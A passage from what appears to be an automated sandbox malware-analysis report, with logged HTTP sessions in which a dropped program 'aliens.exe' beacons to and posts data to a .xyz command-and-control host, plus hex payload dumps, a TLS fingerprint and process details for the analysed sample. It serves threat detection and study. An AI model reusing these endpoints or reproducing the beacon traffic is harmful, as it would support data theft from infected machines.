                                                                                                                                                  Dec 5, 2020 08:42:59.278107882 CET4259INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:42:59 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d696391eb5a20a19c3eb6a572057a66cd1607154177; expires=Mon, 04-Jan-21 07:42:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373af9100004120ce08e000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YwISspKcmN7Y405nkM4isjNKKK2Zb1DmWM8IippHWMqcmFi%2BAhA%2BfSO%2BKmOt9cCLMwDPBrKuY6oVMVhU5RxZOEpIKoMOQzLB1b2yPEW6SxmTWFVahw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc222c1a814120-PRG
                                                                                                                                                  Data Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                  Data Ascii: 11
                                                                                                                                                  Dec 5, 2020 08:42:59.316557884 CET4260OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:02.855652094 CET4262INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:02 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dd93d0f420e7a6c60eb5dae47e64e84391607154179; expires=Mon, 04-Jan-21 07:42:59 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373b50000004120fda51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=3zvH0rPrkWrkKbxJeXAIVNMngRqjD7U9LanAYk0q7BjdF%2B5y2tc9VnF%2FPENZRbiTGQUkJ%2BFNu5qcXVcw6lPPG%2BrnXOSa6gLFLXk%2FeIqWX5%2B%2Bq2tbQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2234cf8a4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:03.095493078 CET4262OUTPOST /info/g HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 1405
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:04.337274075 CET4265INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:04 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d111cdcac6d047e629428e7b4c99708761607154183; expires=Mon, 04-Jan-21 07:43:03 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c3dd00004120f801f000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=zv7DK1KDGTiyLMdaPnp0rxO8Mqva%2BBSUPFmxm7%2FirxdEYXzpKXfzH51PewZ8vLW5z2UM2T06U%2FtlrdEk9y4BfI7sLA3vT5Wc1N9FVu2DuL2j0ZSDEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc224c7bce4120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:04.348758936 CET4266OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:07.258394003 CET4267INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:07 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d8d9d37752442a3b202bea83cb00d4f8c1607154184; expires=Mon, 04-Jan-21 07:43:04 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373c8a900004120d81f9000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=ETZjUdcpCwC%2BZivTgIHk0X22ERLHufV0Eehw%2FhiFdX8nDMv%2FDK8jQfx1TSKN0LTxWJb%2ByK%2FFVxDwJXLqE7qMtkvhzZ5QcGyRi35%2BlabW%2BOAK%2B6jZ7w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc225448194120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:07.292275906 CET4267OUTGET /info/r HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:08.427812099 CET4268INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:08 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0cd7da8d808be268c8436cfafaea59c31607154187; expires=Mon, 04-Jan-21 07:43:07 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d373d42800004120d8aae000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=VSlmuNTBv7okEoCH4i32AqgNsMk48HhR%2FzV0NK4M4bGJoIQpVkqtZXWyQBfsJtJKoy%2F3GhzrbfNMoFqGSsCS1QtSl3kuAl60M5S%2FTOp%2FxQk%2FKOJ8DA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2266abb64120-PRG
                                                                                                                                                  Data Raw: 63 0d 0a 36 6d 74 6e 56 58 47 68 64 31 30 7e 0d 0a
                                                                                                                                                  Data Ascii: c6mtnVXGhd10~
                                                                                                                                                  Dec 5, 2020 08:43:30.096564054 CET4276OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:34.401576996 CET4279INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:34 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d410e765879973c765abf01de61c2fa491607154210; expires=Mon, 04-Jan-21 07:43:30 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d3742d3d000041203d8a5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YToItkX0sS8Vefjg5Y4oykJAC5lYUzPoLhWw376XPEfrTfOTze7li9lzAxyMQzPzzYfQ%2FGxqd%2BTVLracm4fbptQWlv4HGRKTeoKkg6Rs5ZK1wD1oFg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22f529e34120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:57.305152893 CET7827OUTPOST /info/du HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 125
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:58.680834055 CET7843INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:58 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d911a86354a154f4d45bff8c6f16ad1131607154237; expires=Mon, 04-Jan-21 07:43:57 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d374978500004120da910000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=tw3sB28BceV52SsEyjr%2BhBHIHnnD2mTSvqzz3DG3rdDxEWSgO7egRAh3pKqjgZAvPzHV3a9KCUGlanchXyiHlPi8drdtLRm3ztuHjDSDBSl6sekExg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc239f3b904120-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  2192.168.2.349740104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:28.448842049 CET4275OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 93
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:32.399786949 CET4277INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:32 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=dbda57ca824670aeb15962b7f96e3302a1607154208; expires=Mon, 04-Jan-21 07:43:28 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37426d0000027bc0b12b000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=TbvyRibHa2c3bNnK1im0hqyUzcf03R79kf4PqGuyPXplybVNb8gS97Px9aT%2FdeUN%2BfWXd%2FHImfvbX6HvaVmDXmoCakq6BpmJQU66OqBtKbhpRVK0vw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc22eae9d227bc-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  3192.168.2.349741104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:33.103669882 CET4278OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:36.861763954 CET4280INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:36 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d6ab65dbae494ae6d92ea824b1843e9691607154213; expires=Mon, 04-Jan-21 07:43:33 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37438fb0000412c93a51000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=IgDBf%2B5RvUoWP105LTZAwqQGdaWeiQSee%2BwvYyovuy4XJvAihBlpA0moSin89G5pWrLlT1KuOsDIEYrCu9ofQnegXZYtj1j9EM3vy6kxyWZFjTzvKg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2307f93c412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0
                                                                                                                                                  Dec 5, 2020 08:43:40.024529934 CET4341OUTPOST /info/w HTTP/1.1
                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                  Pragma: no-cache
                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                  Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                  upgrade-insecure-requests: 1
                                                                                                                                                  Content-Length: 81
                                                                                                                                                  Host: ef6df4af06ba6896.xyz
                                                                                                                                                  Dec 5, 2020 08:43:43.565794945 CET4848INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:43 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=d0e507f4c0f150e265543a4b9cde0694c1607154220; expires=Mon, 04-Jan-21 07:43:40 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d37454040000412cf40b5000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=YgtztI7FjnIJJzB9ajN28lFuCQiHi8rQ2P8v6WX9Xp1NJWFmd7%2FbIWO%2FwtLlyLLGQsKyzIWjO1vvyqkBe6%2FbAQmeD%2FY3i0WeIGgXqNGso6rQlS0YQw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc23333db7412c-PRG
                                                                                                                                                  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                  Data Ascii: 0


                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                  4192.168.2.349749104.28.4.12980C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                  Dec 5, 2020 08:43:43.650659084 CET4849OUTGET /info/ddd HTTP/1.1
                                                                                                                                                  Host: EF6DF4AF06BA6896.xyz
                                                                                                                                                  Accept: */*
                                                                                                                                                  Dec 5, 2020 08:43:44.997695923 CET5053INHTTP/1.1 200 OK
                                                                                                                                                  Date: Sat, 05 Dec 2020 07:43:44 GMT
                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                  Connection: keep-alive
                                                                                                                                                  Set-Cookie: __cfduid=de632e683c144605b22411be5233876341607154223; expires=Mon, 04-Jan-21 07:43:43 GMT; path=/; domain=.ef6df4af06ba6896.xyz; HttpOnly; SameSite=Lax
                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                                                                  cf-request-id: 06d374622e0000278cd63bb000000001
                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=MON8MExJN870FwT45Tf%2B5uHZ0HmE9BKb2%2FpyIiL277bSvhUNGRlXMqeIEPbRzspy2LsUVqoWFLoWSmu7HRg91Yo3Bt2aqALo3HWSZNtrj73HUtJEnQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                  NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                                                                  Server: cloudflare
                                                                                                                                                  CF-RAY: 5fcc2349ebdd278c-PRG
                                                                                                                                                  Data Raw: 32 32 63 0d 0a 78 68 75 70 66 71 73 6d 67 6e 58 47 55 33 71 74 2d 69 59 44 75 70 33 44 69 42 46 51 4a 6f 63 62 56 5f 71 5f 4e 48 30 38 74 53 4a 39 61 34 41 42 67 76 46 68 4b 7a 58 35 76 6c 72 72 65 4f 30 7a 38 56 6b 34 64 6f 47 38 59 6d 43 30 4e 4f 5f 57 67 36 49 78 48 70 49 48 4f 4a 6f 6b 71 6a 4d 4b 51 54 34 6f 5f 76 39 59 78 54 57 79 56 6e 6f 77 37 56 54 59 4d 68 4f 74 71 6f 38 43 58 37 67 6a 51 77 30 70 59 38 62 52 39 33 59 39 57 71 68 31 4f 2d 76 79 36 4c 4a 49 45 4f 4e 74 6d 57 66 58 62 62 55 76 6d 68 49 68 56 47 71 52 6b 72 62 78 36 36 32 71 4a 5f 30 4b 50 53 67 4c 79 38 49 74 67 5a 77 58 75 38 49 33 42 6e 7a 64 30 6f 70 4a 30 4b 51 31 35 57 74 51 49 6a 56 6e 6a 48 71 66 33 43 64 42 59 53 4c 77 4e 76 37 54 43 68 6d 6c 48 69 50 6e 54 65 6a 48 72 43 34 4e 42 70 6e 30 57 6a 79 56 41 37 7a 68 43 34 51 33 65 76 41 74 32 73 6a 42 35 71 65 48 75 4a 6c 48 61 63 61 38 38 72 36 78 5a 43 61 4a 32 66 6d 33 65 70 77 41 42 47 68 49 51 6e 76 76 48 70 31 42 6e 73 53 79 6f 79 45 41 49 55 6e 50 59 6f 56 33 66 32 39 32 56 55 6a 6d 65 79 73 7a 63 72 74 36 39 32 45 35 6f 44 7a 37 63 41 64 6d 41 5a 70 74 6d 69 4b 54 56 31 77 51 42 55 66 53 34 43 6f 64 37 70 4e 4f 76 4a 4c 62 45 36 5f 56 47 6c 44 75 41 45 53 4c 6e 6f 62 36 75 48 41 31 74 6b 65 6d 75 2d 61 79 68 6d 46 32 46 6a 7a 44 4d 59 76 47 30 46 30 43 5a 58 76 78 35 67 76 6a 6a 52 59 47 6c 59 36 70 74 36 6d 46 6f 67 64 31 69 64 67 6c 4b 54 66 69 5a 71 58 63 69 61 38 54 39 39 68 50 62 62 68 77 52 4a 70 71 63 49 31 51 55 6a 66 4b 55 51 2d 4c 73 5a 62 46 6c 52 46 6d 66 4a 6f 4e 52 78 6d 4c 55 6d 67 4f 45 4e 68 6d 4c 37 69 4e 78 7a 55 46 62 55 61 79 46 36 54 53 47 52 36 66 64 66 74 41 52 72 41 74 70 5a 32 46 62 6a 38 7e 0d 0a
                                                                                                                                                  Data Ascii: 22cxhupfqsmgnXGU3qt-iYDup3DiBFQJocbV_q_NH08tSJ9a4ABgvFhKzX5vlrreO0z8Vk4doG8YmC0NO_Wg6IxHpIHOJokqjMKQT4o_v9YxTWyVnow7VTYMhOtqo8CX7gjQw0pY8bR93Y9Wqh1O-vy6LJIEONtmWfXbbUvmhIhVGqRkrbx662qJ_0KPSgLy8ItgZwXu8I3Bnzd0opJ0KQ15WtQIjVnjHqf3CdBYSLwNv7TChmlHiPnTejHrC4NBpn0WjyVA7zhC4Q3evAt2sjB5qeHuJlHaca88r6xZCaJ2fm3epwABGhIQnvvHp1BnsSyoyEAIUnPYoV3f292VUjmeyszcrt692E5oDz7cAdmAZptmiKTV1wQBUfS4Cod7pNOvJLbE6_VGlDuAESLnob6uHA1tkemu-ayhmF2FjzDMYvG0F0CZXvx5gvjjRYGlY6pt6mFogd1idglKTfiZqXcia8T99hPbbhwRJpqcI1QUjfKUQ-LsZbFlRFmfJoNRxmLUmgOENhmL7iNxzUFbUayF6TSGR6fdftARrAtpZ2Fbj8~


                                                                                                                                                  HTTPS Packets

                                                                                                                                                  TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                  Dec 5, 2020 08:43:12.476727009 CET172.67.142.39443192.168.2.349739CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=CA, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEThu Sep 24 02:00:00 CEST 2020 Mon Jan 27 13:48:08 CET 2020Fri Sep 24 14:00:00 CEST 2021 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0ce5f3254611a8c095a3d821d44539877
                                                                                                                                                  CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                                                                                                                                                  Code Manipulations

                                                                                                                                                  Statistics

                                                                                                                                                  Behavior

                                                                                                                                                  Click to jump to process

                                                                                                                                                  System Behavior

                                                                                                                                                  Analysis Process: h1GodtbhC8.exe PID: 5356 Parent PID: 5672

                                                                                                                                                  General

                                                                                                                                                  Start time:08:40:22
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\Desktop\h1GodtbhC8.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\Desktop\h1GodtbhC8.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:4671378 bytes
                                                                                                                                                  MD5 hash:3CA6DF4914385EFD4BA9CD239B5ED254
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: setup.exe PID: 2172 Parent PID: 5356

                                                                                                                                                  General

                                                                                                                                                  Start time:08:40:23
                                                                                                                                                  Start date:05/12/2020
